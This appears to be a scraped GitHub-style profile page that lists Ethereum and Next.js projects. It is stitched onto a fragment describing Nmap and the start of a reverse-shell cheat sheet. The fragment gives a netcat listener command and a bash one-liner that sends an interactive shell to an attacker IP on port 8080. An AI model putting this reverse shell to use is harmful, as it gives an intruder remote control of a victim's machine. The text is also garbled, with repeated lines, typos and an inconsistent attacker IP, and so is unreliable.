Have an idea? Drop me a Mail or DM.
I like to work on Ethereum blockchain, Crypto, Web application, Security Ops, Cloud/Serverless applications, & Integrations.
Have an idea? Drop me a Mail or DM.
I like to work on Ethereum blockchain, Crypto, Web application, Security Ops, Cloud/Serverless applications, & Integrations.
Forked from ethereum/ethereum-org-website
Ethereum.org is a primary online resource for the Ethereum community.
Markdown 1
Medusa + Next.js starter frontend UI project as a part of Open source contribution. A beautiful Next.js based storefront for @medusajs
Nyan cat game with MetaMask authentication for Web 3.0 ecosystem. Made out of Next.js & Moralis. Database powered by @redis (Currently in hibernation)
JavaScript 7
Nmap ("Network Mapper") is a free and open source utility for network discovery and security auditing.
Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering,
what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.
The following examples assums the hacker IP is 10.20.14 and use port 8080 for the connection.
Therefore in all f these cases you need to listen for port 8080 using the foolowing command `nc -vv -l -p 8080`
BASH
bash -i >& /dev/tcp/10.20.14.203/8080 0>&1